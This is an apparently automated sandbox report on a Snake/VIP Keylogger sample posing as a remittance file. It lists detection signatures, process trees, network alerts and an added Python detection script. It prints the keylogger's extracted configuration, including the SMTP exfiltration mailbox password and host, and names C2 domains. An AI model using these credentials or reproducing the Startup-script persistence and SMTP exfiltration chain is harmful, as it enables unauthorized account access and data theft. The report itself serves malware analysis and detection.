Windows Analysis Report
z84TTREMITTANCEUSD347_432_63.exe

Overview

General Information

Sample name: z84TTREMITTANCEUSD347_432_63.exe
Analysis ID: 1518314
MD5: 34280e3a145d8d865efedf422b568e46
SHA1: d5e2b2072a08a672d87446df36e513095945d151
SHA256: 4ffad08e9b831394159944b7c719bd9a80efcde000ebfa788de1a23f64007b91
Tags: exe, SnakeKeylogger, user-Porcupine

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z84TTREMITTANCEUSD347_432_63.exe (PID: 612 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
    • name.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
      • RegSvcs.exe (PID: 6004 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6444 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
      • RegSvcs.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | (none listed) | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Extracted configuration (VIP Keylogger extractor): {"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Extracted configuration (Snake Keylogger extractor): {"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
(33 entries in total; the remaining entries are not shown)
Source | Rule | Description | Author | Strings
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
7.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
7.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d5eb:$a1: get_encryptedPassword
  • 0x2d8f8:$a2: get_encryptedUsername
  • 0x2d409:$a3: get_timePasswordChanged
  • 0x2d504:$a4: get_passwordField
  • 0x2d601:$a5: set_encryptedPassword
  • 0x2ec8b:$a7: get_logins
  • 0x2ebee:$a10: KeyLoggerEventArgs
  • 0x2e853:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hooking | ditekSHen
  • 0x2e20a:$s1: UnHook
  • 0x2e211:$s2: SetHook
  • 0x2e219:$s3: CallNextHook
  • 0x2e226:$s4: _hook
6.2.name.exe.43c0000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(25 entries in total; the remaining entries are not shown)

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", ProcessId: 6444, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6004, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49727
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", CommandLine|base64offset|contains: (empty), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs", ProcessId: 6444, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3228, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
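The three Sigma hits in this report describe one persistence and exfiltration chain: name.exe writes name.vbs into the user's Startup folder (file creation), wscript.exe is later launched against that script (process creation), and the hollowed RegSvcs.exe opens an outbound connection to TCP 587 (network connection). The Python below is an added example written for this page, not Joe Sandbox's or any Sigma rule's own code. It encodes those three checks as detection logic over Sysmon-style events; the first three events are constructed from the fields shown above, the two benign controls (a mail client on 587, an admin script outside Startup) are hypothetical, and the list of .NET utilities is the author's assumption of which hollowing targets should never speak SMTP.

```python
"""Detection logic for the three behaviours flagged by Sigma in this report,
run over Sysmon-style events constructed from the report's own fields.

Added example, not Joe Sandbox or Sigma code. Event IDs follow Sysmon:
1 = process creation, 3 = network connection, 11 = file creation.
"""
from __future__ import annotations

import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".vba")
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Assumption: .NET framework utilities often hollowed by .NET stealers; none send mail legitimately.
DOTNET_UTILITIES = ("regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe")
SMTP_PORTS = {25, 465, 587}

# Constructed events: the first three mirror the report, the last two are benign controls.
EVENTS = [
    {"EventID": 11, "ProcessId": 3228,
     "Image": r"C:\Users\user\AppData\Local\directory\name.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"},
    {"EventID": 1, "ProcessId": 6444, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"'},
    {"EventID": 3, "ProcessId": 6004,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "DestinationIp": "208.91.198.143", "DestinationPort": 587, "Protocol": "tcp", "Initiated": True},
    # hypothetical benign controls
    {"EventID": 3, "ProcessId": 4100, "Image": r"C:\Program Files\Mail\mailclient.exe",
     "DestinationIp": "203.0.113.25", "DestinationPort": 587, "Protocol": "tcp", "Initiated": True},
    {"EventID": 1, "ProcessId": 4200, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r'cscript.exe "C:\Program Files\Vendor\inventory.vbs"'},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _quoted_script_args(cmdline: str) -> list[str]:
    """Quoted command-line arguments that end in a script extension."""
    return [a for a in re.findall(r'"([^"]+)"', cmdline) if a.lower().endswith(SCRIPT_EXTS)]


def detect(event: dict) -> list[str]:
    """Return the names of the rules one event triggers, in evaluation order."""
    hits: list[str] = []
    image = _basename(event.get("Image", ""))
    eid = event.get("EventID")
    if eid == 1:
        cmd = event.get("CommandLine", "").lower()
        if image in SCRIPT_HOSTS and any(ext in cmd for ext in SCRIPT_EXTS):
            hits.append("wsh_script_execution")         # script file run via cscript/wscript
            if STARTUP_DIR in cmd:
                hits.append("wsh_script_from_startup")  # the script lives in a Startup folder
    elif eid == 3:
        port = int(event.get("DestinationPort", 0))
        if event.get("Initiated") is True and port in SMTP_PORTS:
            hits.append("outbound_smtp")                # any outbound SMTP connection
            if image in DOTNET_UTILITIES:
                hits.append("dotnet_utility_smtp")      # RegSvcs.exe & co. sending mail = hollowed
    elif eid == 11:
        target = event.get("TargetFilename", "").lower()
        if STARTUP_DIR in target and target.endswith(SCRIPT_EXTS):
            hits.append("script_dropped_in_startup")    # script written to a Startup folder
    return hits


def correlate_startup_persistence(events: list[dict]) -> dict[str, str]:
    """Map every Startup script that was both dropped and later executed to its dropper."""
    dropped: dict[str, str] = {}
    executed: set[str] = set()
    for ev in events:
        hits = detect(ev)
        if "script_dropped_in_startup" in hits:
            dropped[ev["TargetFilename"].lower()] = _basename(ev["Image"])
        if "wsh_script_from_startup" in hits:
            executed.update(a.lower() for a in _quoted_script_args(ev["CommandLine"]))
    return {path: dropper for path, dropper in dropped.items() if path in executed}


if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ProcessId"], detect(ev))
    print(correlate_startup_persistence(EVENTS))
```

The per-event checks are deliberately loose (any outbound SMTP, any WSH script) and gain their precision from the second tier: a .NET utility as the SMTP client, and a script that the same host both dropped into Startup and later executed from there.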
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T15:34:14.669336+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:20.252908+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:33.024873+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:36.632789+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:40.422975+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49742 | 188.114.97.3 | 443 | TCP
2024-09-25T15:34:41.510510+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T15:34:13.196430+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:14.071432+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:15.196577+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:31.649538+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49728 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:32.446433+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49728 | 193.122.130.0 | 80 | TCP
2024-09-25T15:34:33.540191+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49731 | 193.122.130.0 | 80 | TCP

AV Detection

Source: z84TTREMITTANCEUSD347_432_63.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\directory\name.exe | Avira: detection malicious, Label: HEUR/AGEN.1321293
Source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 6.2.name.exe.43c0000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\directory\name.exe | Joe Sandbox ML: detected
Source: z84TTREMITTANCEUSD347_432_63.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: z84TTREMITTANCEUSD347_432_63.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00452492
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00442886
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_004788BD
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_004339B6
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 6_2_0045CAFA
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00431A86
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 6_2_0044BD27
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045DE8F FindFirstFileW,FindClose, 6_2_0045DE8F
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_0044BF8B
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0246F8E9h 3_2_0246F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0246FD41h 3_2_0246FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061631E0h 3_2_06162DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06160D0Dh 3_2_06160B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06161697h 3_2_06160B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06162C19h 3_2_06162968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616E0A9h 3_2_0616DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06160673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616E959h 3_2_0616E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616F209h 3_2_0616EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616CF49h 3_2_0616CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616D7F9h 3_2_0616D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061631E0h 3_2_06162DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616E501h 3_2_0616E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616EDB1h 3_2_0616EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616F661h 3_2_0616F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616FAB9h 3_2_0616F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06160853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_06160040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616D3A1h 3_2_0616D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 061631E0h 3_2_0616310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0616DC51h 3_2_0616D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 02BCF8E9h 7_2_02BCF631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 02BCFD41h 7_2_02BCFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576E959h 7_2_0576E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576D7F9h 7_2_0576D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 057631E0h 7_2_05762DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 057631E0h 7_2_05762DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576CF49h 7_2_0576CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576F209h 7_2_0576EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576E0A9h 7_2_0576DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05762C19h 7_2_05762968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 057631E0h 7_2_0576310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576DC51h 7_2_0576D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05760040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576FAB9h 7_2_0576F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576D3A1h 7_2_0576D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05760D0Dh 7_2_05760B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05761697h 7_2_05760B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576EDB1h 7_2_0576EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576F661h 7_2_0576F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0576E501h 7_2_0576E258

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
